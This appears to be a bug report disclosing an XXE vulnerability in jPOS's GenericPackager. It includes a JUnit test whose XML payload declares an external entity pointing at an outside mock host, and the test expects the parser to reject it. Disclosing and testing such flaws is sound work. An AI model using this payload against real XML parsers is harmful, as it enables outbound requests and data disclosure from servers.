GenericPackager (as well as GenericValidatingPackager) is vulnerable to an XML External Entity (XXE) attack.
Here is the test example that reproduces it:
```java
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.fail;

import java.io.ByteArrayInputStream;
import org.jpos.iso.ISOException;
import org.jpos.iso.packager.GenericPackager;
import org.junit.jupiter.api.Test;

@Test
public void testXXEAttack() {
    try {
        String xxeAttackXml = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n"
            + "<!DOCTYPE foo [\n"
            + " <!ELEMENT foo ANY >\n"
            + " <!ENTITY xxe SYSTEM \"https://jposxee.free.beeceptor.com/hacked\" >]>\n"
            + "<foo>&xxe;</foo>";
        // The packager parses the XML; a hardened parser should reject the external entity
        new GenericPackager().readFile(new ByteArrayInputStream(xxeAttackXml.getBytes()));
        fail("Expected ISOException to be thrown");
    } catch (ISOException ex) {
        assertEquals("Entity extension is disabled", ex.getMessage(), "ex.getMessage()");
    }
}
```
The `xxe` entity is getting resolved and the request goes to https://jposxee.free.beeceptor.com/hacked (it's just a mock API).
It's not a finalized test that you can check in, but it gives you the idea.
felipebonezi